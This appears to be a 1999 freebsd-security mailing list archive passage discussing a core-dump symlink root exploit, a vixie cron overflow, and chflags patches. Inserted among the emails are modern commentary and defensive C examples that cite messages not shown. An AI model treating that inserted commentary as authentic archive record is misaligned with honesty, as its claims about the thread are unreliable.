This offers an "on > : the fly" workaround. > > Setuid binaries already don't dump core. > > Warner > What I didn't mention was the that a 'chmod -r xxxx' disables core dumps on binaries whether setuid or not on Digital Unix (which will happily dump core for a setuid binary -- I know, its silly). - Barrett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 20:38: 6 1999 Delivered-To: freebsd-security@freebsd.org Received: from godzilla.zeta.org.au (godzilla.zeta.org.au [203.26.10.9]) by hub.freebsd.org (Postfix) with ESMTP id 21CDA1532A for ; Thu, 26 Aug 1999 20:37:46 -0700 (PDT) (envelope-from bde@godzilla.zeta.org.au) Received: (from bde@localhost) by godzilla.zeta.org.au (8.8.7/8.8.7) id NAA19831; Fri, 27 Aug 1999 13:35:51 +1000 Date: Fri, 27 Aug 1999 13:35:51 +1000 From: Bruce Evans Message-Id: <199908270335.NAA19831@godzilla.zeta.org.au> To: hart@iserver.com, imp@village.org Subject: Re: FreeBSD (and other BSDs?) local root explot] Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >: Has anyone investigated patches to the fts(3) functions in libc? We've >: seen kernel patches (to stop following symbolic links when dumping core?) >: but it would be nice to fix the fts(3) bugs as well that started all of >: this. > >Bruce has done that. He's trying to get them to the point he's happy I checked my backups and found that I fixed it on May 6 (a week before the first BUGTRAQ mail about it that I know of). Requests for reviews were not responded to :-(. >with them and track down all the implied POSIX issues that might >result from changing fts. I will admit that I've been slow in the Actually, all the C portability and programming issues. fts does bad things like pointer arithmetic with pointers to storage that may have been invalidated by realloc(). >This exploit pointed out several bugs. 
periodic shouldn't allow its I wanted a review because I'm not a security person and didn't want to guess the extent of the bug. >children to dump core (since you don't want new core files in your >dump every day), core dumps *MUST*NOT* follow symbolic links (which >they didn't do in 2.x, but there was some back sliding in 3.x and 4.x >in this area), fts has an overflow which can cause problems in large, >wide trees. Had any one of these been different, the problem would >not have happened. There are also some downstream issues with many I think the pointer bug would just have been harder to exploit. Bruce To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 20:59:14 1999 Delivered-To: freebsd-security@freebsd.org Received: from tor-dev1.nbc.netcom.ca (tor-dev1.nbc.netcom.ca [207.181.89.12]) by hub.freebsd.org (Postfix) with ESMTP id 24ED114E01 for ; Thu, 26 Aug 1999 20:59:10 -0700 (PDT) (envelope-from taob@tor-dev1.nbc.netcom.ca) Received: by tor-dev1.nbc.netcom.ca (8.9.1/8.9.1) id XAA23742; Thu, 26 Aug 1999 23:58:38 -0400 (EDT) Date: Thu, 26 Aug 1999 23:58:38 -0400 (EDT) From: Brian Tao X-Sender: taob@tor-dev1.nbc.netcom.ca To: FREEBSD-SECURITY Subject: Buffer overflow in vixie cron? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org RedHat published a security advisory for the version of vixie-cron included in RH 4.2, 5.2 and 6.0 today. Is our version also vulnerable? I haven't seen the diffs yet, but it is in the cron_popen() call in /usr/src/usr.sbin/cron/cron/popen.c . 
-- Brian Tao (BT300, taob@risc.org) "Though this be madness, yet there is method in't" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 21:20:58 1999 Delivered-To: freebsd-security@freebsd.org Received: from gatekeeper.veriohosting.com (gatekeeper.veriohosting.com [192.41.0.2]) by hub.freebsd.org (Postfix) with ESMTP id 6321215487 for ; Thu, 26 Aug 1999 21:20:55 -0700 (PDT) (envelope-from hart@iserver.com) Received: by gatekeeper.veriohosting.com; Thu, 26 Aug 1999 22:20:54 -0600 (MDT) Received: from unknown(192.168.1.109) by gatekeeper.veriohosting.com via smap (V3.1.1) id xma003126; Thu, 26 Aug 99 22:20:50 -0600 Received: (hart@localhost) by anchovy.orem.iserver.com (8.9.3) id WAA08064; Thu, 26 Aug 1999 22:19:54 -0600 (MDT) Date: Thu, 26 Aug 1999 22:19:54 -0600 (MDT) From: Paul Hart X-Sender: hart@anchovy.orem.iserver.com To: Brian Tao Cc: freebsd-security@FreeBSD.ORG Subject: Re: Buffer overflow in vixie cron? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 26 Aug 1999, Brian Tao wrote: > RedHat published a security advisory for the version of vixie-cron > included in RH 4.2, 5.2 and 6.0 today. Is our version also vulnerable? I don't believe so. I looked through 3.2-STABLE and didn't see any overflows. I haven't looked at the exact Linux diff, but from the description of the problem it sounds like they fixed the line where the sendmail pipe command string buffer is built. Our code already uses snprintf when using the MAILTO value, but the original Vixie cron used sprintf without length checks in both version 3.0 and 3.0.1. I'm assuming that's where the hole was. Paul Hart -- Paul Robert Hart ><8> ><8> ><8> Verio Web Hosting, Inc. 
hart@iserver.com ><8> ><8> ><8> http://www.iserver.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 26 22: 3:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 139DB1514E for ; Thu, 26 Aug 1999 22:03:34 -0700 (PDT) (envelope-from snar@lucky.net) Received: (from snar@localhost) by burka.carrier.kiev.ua (8.Who.Cares/Guinness_Is_Better) id IAA15767; Fri, 27 Aug 1999 08:01:58 +0300 (EEST) (envelope-from snar) Message-ID: <19990827080158.A15699@lucky.net> Date: Fri, 27 Aug 1999 08:01:58 +0300 From: Alexandre Snarskii To: Brian Tao , FREEBSD-SECURITY Subject: Re: Buffer overflow in vixie cron? References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.90.11i In-Reply-To: ; from Brian Tao on Thu, Aug 26, 1999 at 11:58:38PM -0400 X-NCC-RegID: ua.luckynet Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Aug 26, 1999 at 11:58:38PM -0400, Brian Tao wrote: > RedHat published a security advisory for the version of vixie-cron > included in RH 4.2, 5.2 and 6.0 today. Is our version also > vulnerable? I haven't seen the diffs yet, but it is in the > cron_popen() call in /usr/src/usr.sbin/cron/cron/popen.c . That bug is not from cron_popen(), but from the paramerers to that call. Really, in classic vixie cron there were a chance to prepare _any_ command string to execute. 
FreeBSD is not vulnerabile since 1995 (2.0.5-alpha) ( cite from: http://www.freebsd.org/cgi/cvsweb.cgi/src/usr.sbin/cron/cron/do_command.c ) 1.4 Fri Apr 14 21:54:18 1995 UTC by ache CVS Tags: RELENG_2_0_5_ALPHA Diffs to 1.3 Fix MAILTO hole by passing -t to sendmail Submitted by: Mike Pritchard _________________________________________________________________ 1.3 Thu Apr 13 20:58:13 1995 UTC by ache Diffs to 1.2 Really fix MAILTO hole by parsing spaces. Remove local bitstring copy _________________________________________________________________ 1.2 Wed Apr 12 18:57:37 1995 UTC by ache Diffs to 1.1 Close MAILTO security hole -- Alexander Snarskii the source code is included. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 1:21:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from mrelay.jrc.it (mrelay.jrc.it [139.191.1.65]) by hub.freebsd.org (Postfix) with ESMTP id 0FAE515011 for ; Fri, 27 Aug 1999 01:20:49 -0700 (PDT) (envelope-from nick.hibma@jrc.it) Received: from elect8 (elect8.jrc.it [139.191.71.152]) by mrelay.jrc.it (LMC5692) with ESMTP id KAA10896; Fri, 27 Aug 1999 10:20:37 +0200 (MET DST) Date: Fri, 27 Aug 1999 10:20:38 +0200 (MET DST) From: Nick Hibma X-Sender: n_hibma@elect8 Reply-To: Nick Hibma To: Matt Ayres Cc: freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Try again, but send the message to majordomo@freebsd.org with in the body of the message: subscribe freebsd-security > subscribe > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body 
of the message From owner-freebsd-security Fri Aug 27 1:41:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from pubnix.org (pubnix.org [209.3.192.40]) by hub.freebsd.org (Postfix) with ESMTP id 31A60152CA for ; Fri, 27 Aug 1999 01:41:34 -0700 (PDT) (envelope-from jtb@pubnix.org) Received: from localhost (jtb@localhost) by pubnix.org (8.9.1/8.9.1) with ESMTP id EAA26927; Fri, 27 Aug 1999 04:37:53 -0400 (EDT) Date: Fri, 27 Aug 1999 04:37:52 -0400 (EDT) From: jtb To: Nick Hibma Cc: Matt Ayres , freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just a guess but I'd bet he's not going to get that. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Jonathan T. Bowie ADM w00w00 WSD jobe@sekurity.org jtb@pubnix.org jobe@dataforce.net Independant Security Developer Home: (603)436-5698 "I'd hate to advocate drugs, sex, alcohol, or Cell: (603)553-6697 violence... to any one, but they've worked for me." -- Hunter S. 
Thompson =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= On Fri, 27 Aug 1999, Nick Hibma wrote: > > Try again, but send the message to majordomo@freebsd.org with in the > body of the message: > > subscribe freebsd-security > > > > > subscribe > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > -- > ISIS/STA, T.P.270, Joint Research Centre, 21020 Ispra, Italy > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5: 0: 8 1999 Delivered-To: freebsd-security@freebsd.org Received: from noc.santacruz.org (noc.santacruz.org [209.133.111.168]) by hub.freebsd.org (Postfix) with ESMTP id 8371B15137 for ; Fri, 27 Aug 1999 05:00:05 -0700 (PDT) (envelope-from klynn@santacruz.org) Received: by noc.santacruz.org (Postfix, from userid 1003) id 31070CD44; Fri, 27 Aug 1999 05:03:10 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by noc.santacruz.org (Postfix) with ESMTP id 206A5CD43; Fri, 27 Aug 1999 05:03:10 -0700 (PDT) Date: Fri, 27 Aug 1999 05:03:10 -0700 (PDT) From: Kevin Lynn To: Nick Hibma Cc: Matt Ayres , freebsd-security@FreeBSD.ORG Subject: Re: subscribe In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Didn't I just read that one in "How many FreeBSD users does it take to change a lightbulb?" 
:P On Fri, 27 Aug 1999, Nick Hibma wrote: > > Try again, but send the message to majordomo@freebsd.org with in the > body of the message: > > subscribe freebsd-security > > > > > subscribe > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5:15:12 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 1163F15EA9; Fri, 27 Aug 1999 05:15:06 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar) Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id JAA00774; Fri, 27 Aug 1999 09:14:22 -0300 (GMT) From: Fernando Schapachnik Message-Id: <199908271214.JAA00774@ns1.sminter.com.ar> Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] In-Reply-To: <199908261758.KAA94925@burka.rdy.com> from Dima Ruban at "Aug 26, 99 10:58:45 am" To: dima@best.net Date: Fri, 27 Aug 1999 09:14:22 -0300 (GMT) Cc: imp@village.org, dima@best.net, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Patches for 2.2.8 are too much asking? Regards! En un mensaje anterior, Dima Ruban escribió: > Warner Losh writes: > > In message <199908261738.KAA94664@burka.rdy.com> Dima Ruban writes: > > : I've just committed a fix. [...] > For -current: > > *** kern/imgact_elf.c 1999/07/09 19:10:14 1.61 > --- kern/imgact_elf.c 1999/08/26 17:32:48 1.62 > *************** > *** 722,729 **** [...] Fernando P. 
Schapachnik Administración de la red VIA Net Works Argentina SA Diagonal Roque Sáenz Peña 971, 4º y 5º piso. 1035 - Capital Federal, Argentina. (54-11) 4323-3333 http://www.via-net-works.net.ar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 27 5:21: 5 1999 Delivered-To: freebsd-security@freebsd.org Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id A1F7B151CF; Fri, 27 Aug 1999 05:20:51 -0700 (PDT) (envelope-from eivind@bitbox.follo.net) Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id OAA06004; Fri, 27 Aug 1999 14:20:17 +0200 (CEST) Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id OAA37744; Fri, 27 Aug 1999 14:20:17 +0200 (MET DST) Date: Fri, 27 Aug 1999 14:20:16 +0200 From: Eivind Eklund To: Fernando Schapachnik Cc: dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot] Message-ID: <19990827142016.U79110@bitbox.follo.net> References: <199908261758.KAA94925@burka.rdy.com> <199908271214.JAA00774@ns1.sminter.com.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.1i In-Reply-To: <199908271214.JAA00774@ns1.sminter.com.ar>; from Fernando Schapachnik on Fri, Aug 27, 1999 at 09:14:22AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote: > Patches for 2.2.8 are too much asking? Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to test it if you have easy access and time). Eivind. 
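The kernel-side rule this thread keeps returning to (Warner Losh: core dumps must not follow symbolic links, and David Greenman's clarification that only the core file being created is affected) has a user-space analogue that is easy to see in working code. The following is an added example, not the imgact_elf.c patch and not code from anyone on this thread: open_core_nofollow() opens the would-be core file with O_NOFOLLOW and then checks through fstat() that what it actually got is a plain, singly linked regular file owned by the dumping user; the temporary-directory scenario in demo_core_symlink_refused() and the name open_core_nofollow are constructed for the demo.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Open, creating it if needed, the file a core image would be written to.
 * O_NOFOLLOW makes open() fail with ELOOP when the final path component
 * is a symbolic link, so a link planted under the core file's name cannot
 * redirect the write onto some other file. fstat() on the descriptor we
 * actually got (not stat() on the name, which could be swapped underneath
 * us) then rejects anything that is not a plain, singly linked regular
 * file owned by the user on whose behalf the dump happens. Directory
 * components earlier in the path are still trusted; that is out of scope.
 * Returns an open descriptor, or -1 with errno set. */
int open_core_nofollow(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);

    if (fd < 0)
        return -1;                      /* ELOOP for a symlink */
    if (fstat(fd, &st) < 0 ||
        !S_ISREG(st.st_mode) ||         /* device, fifo, directory ... */
        st.st_nlink != 1 ||             /* hard link to something else */
        st.st_uid != owner) {           /* not the dumping user's file */
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: in a fresh temporary directory, "victim" is an
 * ordinary file and "core" is a symlink pointing at it, while "core.plain"
 * is a name with nothing behind it yet. Returns 1 when the symlink is
 * refused with ELOOP, the plain name is accepted, and "victim" is left
 * untouched; 0 otherwise. */
int demo_core_symlink_refused(void)
{
    char dir[] = "/tmp/coredemo.XXXXXX";
    char victim[64], link[64], plain[64];
    struct stat st;
    int fd, refused = 0, accepted = 0;

    if (mkdtemp(dir) == NULL)
        return 0;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(link, sizeof link, "%s/core", dir);
    snprintf(plain, sizeof plain, "%s/core.plain", dir);

    fd = open(victim, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd >= 0 && close(fd) == 0 && symlink(victim, link) == 0) {
        fd = open_core_nofollow(link, getuid());
        refused = (fd < 0 && errno == ELOOP);
        if (fd >= 0)
            close(fd);

        fd = open_core_nofollow(plain, getuid());
        accepted = (fd >= 0);
        if (fd >= 0) {
            /* writing is safe here: the descriptor is our own new file */
            if (write(fd, "core image\n", 11) != 11)
                accepted = 0;
            close(fd);
        }
        /* the file behind the symlink must still be empty */
        if (stat(victim, &st) != 0 || st.st_size != 0)
            accepted = 0;
    }
    unlink(plain);
    unlink(link);
    unlink(victim);
    rmdir(dir);
    return refused && accepted;
}

int main(void)
{
    printf("symlink refused, plain file accepted: %s\n",
           demo_core_symlink_refused() ? "yes" : "NO");
    return 0;
}
```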
From owner-freebsd-security Fri Aug 27 07:01:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.sminter.com.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id CFA1A154D7; Fri, 27 Aug 1999 07:01:18 -0700 (PDT) (envelope-from fpscha@ns1.sminter.com.ar)
Received: (from fpscha@localhost) by ns1.sminter.com.ar (8.8.5/8.8.4) id KAA19431; Fri, 27 Aug 1999 10:58:19 -0300 (GMT)
From: Fernando Schapachnik
Message-Id: <199908271358.KAA19431@ns1.sminter.com.ar>
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
In-Reply-To: <19990827142016.U79110@bitbox.follo.net> from Eivind Eklund at "Aug 27, 99 02:20:16 pm"
To: eivind@FreeBSD.ORG (Eivind Eklund)
Date: Fri, 27 Aug 1999 10:58:18 -0300 (GMT)
Cc: fpscha@via-net-works.net.ar, dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Reply-To: Fernando Schapachnik
X-Mailer: ELM [version 2.4ME+ PL40 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

In an earlier message, Eivind Eklund wrote:
> On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote:
> > Patches for 2.2.8 are too much asking?
>
> Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to
> test it if you have easy access and time).

No problem. Is there a known test case anywhere I can grab?

Regards.

Fernando P. Schapachnik
Network Administration
VIA Net Works Argentina SA
Diagonal Roque Sáenz Peña 971, 4th and 5th floor.
1035 - Capital Federal, Argentina.
(54-11) 4323-3333
http://www.via-net-works.net.ar


From owner-freebsd-security Fri Aug 27 07:08:40 1999
Delivered-To: freebsd-security@freebsd.org
Received: from isds.duke.edu (davinci.isds.duke.edu [152.3.22.1]) by hub.freebsd.org (Postfix) with ESMTP id 7DAA9154D7 for ; Fri, 27 Aug 1999 07:08:29 -0700 (PDT) (envelope-from sto@stat.Duke.EDU)
Received: from cayenne.isds.duke.edu (cayenne.isds.duke.edu [152.3.22.11]) by isds.duke.edu (8.8.8/8.8.8) with ESMTP id KAA15509 for ; Fri, 27 Aug 1999 10:08:08 -0400 (EDT)
Received: (from sto@localhost) by cayenne.isds.duke.edu (8.8.8/8.8.8) id KAA29829 for freebsd-security@FreeBSD.ORG; Fri, 27 Aug 1999 10:08:08 -0400 (EDT)
Message-ID: <19990827100807.P28256@stat.Duke.EDU>
Date: Fri, 27 Aug 1999 10:08:07 -0400
From: "Sean O'Connell"
To: FreeBSD security
Subject: Chflags vulnerability in FreeBSD?
Reply-To: "Sean O'Connell"
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.93.2
X-Organization: Institute of Statistics and Decision Sciences
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi All-

I received the following from SANS (www.sans.org) and it intimated that there is a vulnerability in FreeBSD that had previously been thought to only exist in BSDi:

SANS Security Digest Vol. 3 Num. 8

A) 08/05/1999 - BSDI released a security patch for the chflags problem. The vulnerability exists in 4.0.1 and 3.1. BSDI continues to investigate the problem to ensure all possible security concerns are addressed. For more information see:
http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info
http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info

The followup:

SANS Digest EXTRA -- Vol. 3 Num. 8a

4) In item 10, BSDI A of the August SANS Security Digest, we reported the chflags problem as a BSDI-specific problem, when in fact other versions of the BSD kernel are affected as well as some programs (e.g., ssh) based on the same routine. Vendor specific information can be found at:
http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info
http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info
http://www.ssh.fi/sshprotocols2/
http://www.openbsd.org/errata.html#chflags
Also, according to a Bugtraq posting by Adam Morrison on 08/01/1999, NetBSD has corrected the problem and FreeBSD appears to be vulnerable. The SANS Digest editors were unable to locate any FreeBSD-specific information regarding this problem.

Has this been addressed or fixed? If it exists, it should probably be fixed before 3.3 gets out the door.

Thanks
S

--
-----------------------------------------------------------------------
Sean O'Connell                                  Email: sean@stat.Duke.EDU
Institute of Statistics and Decision Sciences   Phone: (919) 684-5419
Duke University                                 Fax:   (919) 684-8594


From owner-freebsd-security Fri Aug 27 07:12:41 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id 6194B14D8B; Fri, 27 Aug 1999 07:12:32 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id QAA07885; Fri, 27 Aug 1999 16:12:07 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id QAA38304; Fri, 27 Aug 1999 16:12:07 +0200 (MET DST)
Date: Fri, 27 Aug 1999 16:12:07 +0200
From: Eivind Eklund
To: Fernando Schapachnik
Cc: dima@best.net, imp@village.org, gsutter@pobox.com, security-officer@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: [secure@FREEBSD.LUBLIN.PL: FreeBSD (and other BSDs?) local root explot]
Message-ID: <19990827161206.W79110@bitbox.follo.net>
References: <19990827142016.U79110@bitbox.follo.net> <199908271358.KAA19431@ns1.sminter.com.ar>
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Mailer: Mutt 0.95.1i
In-Reply-To: <199908271358.KAA19431@ns1.sminter.com.ar>; from Fernando Schapachnik on Fri, Aug 27, 1999 at 10:58:18AM -0300
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Aug 27, 1999 at 10:58:18AM -0300, Fernando Schapachnik wrote:
> In an earlier message, Eivind Eklund wrote:
> > On Fri, Aug 27, 1999 at 09:14:22AM -0300, Fernando Schapachnik wrote:
> > > Patches for 2.2.8 are too much asking?
> >
> > Yes - 2.2.8 doesn't have the problem (AFAIK, at least - feel free to
> > test it if you have easy access and time).
>
> No problem. Is there a known test case anywhere I can grab?

The exploit :) However, looking more carefully, I note we were discussing a different vulnerability than the one I thought. This one is in 2.2, too, I think :-(

Sorry.

Eivind.


From owner-freebsd-security Fri Aug 27 07:18:37 1999
Delivered-To: freebsd-security@freebsd.org
Received: from ns1.yes.no (ns1.yes.no [195.204.136.10]) by hub.freebsd.org (Postfix) with ESMTP id B845614D99 for ; Fri, 27 Aug 1999 07:18:34 -0700 (PDT) (envelope-from eivind@bitbox.follo.net)
Received: from bitbox.follo.net (bitbox.follo.net [195.204.143.218]) by ns1.yes.no (8.9.1a/8.9.1) with ESMTP id QAA07960; Fri, 27 Aug 1999 16:18:15 +0200 (CEST)
Received: (from eivind@localhost) by bitbox.follo.net (8.8.8/8.8.6) id QAA38401; Fri, 27 Aug 1999 16:18:14 +0200 (MET DST)
Date: Fri, 27 Aug 1999 16:18:14 +0200
From: Eivind Eklund
To: "Sean O'Connell"
Cc: FreeBSD security
Subject: Re: Chflags vulnerability in FreeBSD?
Message-ID: <19990827161814.X79110@bitbox.follo.net>
References: <19990827100807.P28256@stat.Duke.EDU>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.95.1i
In-Reply-To: <19990827100807.P28256@stat.Duke.EDU>; from Sean O'Connell on Fri, Aug 27, 1999 at 10:08:07AM -0400
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Aug 27, 1999 at 10:08:07AM -0400, Sean O'Connell wrote:
> Hi All-
>
> I received the following from SANS (www.sans.org) and it intimated
> that there is a vulnerability in FreeBSD that had previously been
> thought to only exist in BSDi:
> SANS Digest EXTRA -- Vol. 3 Num. 8a
>
> 4) In item 10, BSDI A of the August SANS Security Digest, we reported
> the chflags problem as a BSDI-specific problem, when in fact other
> versions of the BSD kernel are affected as well as some programs (e.g.,
> ssh) based on the same routine. Vendor specific information can be
> found at:
> http://www.BSDI.COM/support/patches/patches-4.0.1/M401-014.info
> http://www.BSDI.COM/support/patches/patches-3.1/M310-056.info
> http://www.ssh.fi/sshprotocols2/
> http://www.openbsd.org/errata.html#chflags
> Also, according to a Bugtraq posting by Adam Morrison on 08/01/1999,
> NetBSD has corrected the problem and FreeBSD appears to be vulnerable.
> The SANS Digest editors were unable to locate any FreeBSD-specific
> information regarding this problem.
>
> Has this been addressed or fixed? If it exists, it should probably
> be fixed before 3.3 gets out the door.

It has been fixed, and had been fixed the day the posting was approved for bugtraq (of course, the bugtraq editors then spent 4-5 days before approving the postings pointing this out). SANS has not made any serious attempt to get information - there has, for instance, not come any mail from them to security-officer@FreeBSD.org.

Eivind.
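Back to the vixie cron thread: Paul Hart's closer look (a few messages further on) identifies the original cron_popen() bug as the loop that breaks the command string into an argv[] array without counting how many tokens it has already stored, so a long enough command walks past the end of the stack array. As an added example, not code from Vixie cron or from FreeBSD's cron, here is that split written with the missing count; MAX_ARGS, split_command and the two demo command lines are constructed for this illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_ARGS 16     /* constructed size for the argv[] array */

/* Split a command string into an argv[]-style array, the job cron_popen()
 * does before exec(). Separators are spaces and tabs; the string is cut up
 * in place, strtok-style. The one thing this adds over an uncounted loop
 * is the slot count: a token is stored only while there is room for it
 * and for the terminating NULL, so the array can never be overrun, and
 * argv is left NULL-terminated on every path. Returns the number of
 * arguments stored, or -1 when the command needs more slots than
 * argv_len provides. */
int split_command(char *cmd, char *argv[], size_t argv_len)
{
    size_t argc = 0;
    char *p = cmd;

    if (argv_len == 0)
        return -1;
    while (*p != '\0') {
        while (*p == ' ' || *p == '\t')         /* skip separators */
            p++;
        if (*p == '\0')
            break;
        if (argc + 1 >= argv_len) {             /* no room for token + NULL */
            argv[argc] = NULL;
            return -1;
        }
        argv[argc++] = p;
        while (*p != '\0' && *p != ' ' && *p != '\t')
            p++;                                /* find end of token */
        if (*p != '\0')
            *p++ = '\0';                        /* terminate the token */
    }
    argv[argc] = NULL;
    return (int)argc;
}

/* Constructed input resembling the mailer command cron builds (the -t is
 * the flag the 1995 FreeBSD commit quoted earlier in the thread added).
 * Returns argc (5) when every token came out right, -1 otherwise. */
int demo_mailer_command(void)
{
    char cmd[] = "/usr/sbin/sendmail  -FCronDaemon -odi -oem\t-t";
    char *argv[MAX_ARGS];
    int argc = split_command(cmd, argv, MAX_ARGS);

    if (argc != 5 ||
        strcmp(argv[0], "/usr/sbin/sendmail") != 0 ||
        strcmp(argv[1], "-FCronDaemon") != 0 ||
        strcmp(argv[4], "-t") != 0 ||
        argv[5] != NULL)
        return -1;
    return argc;
}

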